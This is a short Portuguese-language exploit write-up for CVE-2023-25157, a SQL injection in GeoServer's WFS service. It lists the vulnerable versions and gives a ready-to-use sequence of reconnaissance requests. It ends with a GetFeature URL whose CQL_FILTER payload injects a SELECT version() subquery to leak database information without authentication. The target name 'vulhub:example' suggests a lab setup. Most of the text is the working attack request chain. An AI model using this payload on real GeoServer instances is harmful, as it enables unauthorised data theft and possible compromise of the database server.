
Exploit para CVE-2023-25157: injeção de SQL no serviço WFS do GeoServer por meio de sintaxe de filtro CQL manipulada, permitindo extração remota de dados sem autenticação e possível comprometimento do servidor de banco de dados.
Devido à falta de filtragem das entradas do usuário, um atacante remoto não autenticado pode construir uma sintaxe de filtro malformada, contornar a análise léxica do GeoServer, causando injeção de SQL, obtendo informações sensíveis do servidor e, possivelmente, até mesmo privilégios no servidor de banco de dados.
GeoServer 2.20.x < 2.20.7
GeoServer 2.19.x < 2.19.7
GeoServer 2.18.x < 2.18.7
GeoServer 2.21.x < 2.21.4
GeoServer 2.22.x < 2.22.2
Pesquisa
/geoserver/ows?service=WFS&version=1.0.0&request=GetCapabilities

Obtenha as propriedades relacionadas ao nome do recurso
vulhub:example /geoserver/wfs?request=DescribeFeatureType&version=2.0.0&service=WFS&outputFormat=application/json&typeName=vulhub:example

/geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeName=vulhub:example&CQL_FILTER=strStartsWith(name,'x'')+=+true+and+1=(SELECT+CAST+((SELECT+version())+AS+INTEGER))+--+')+=+true



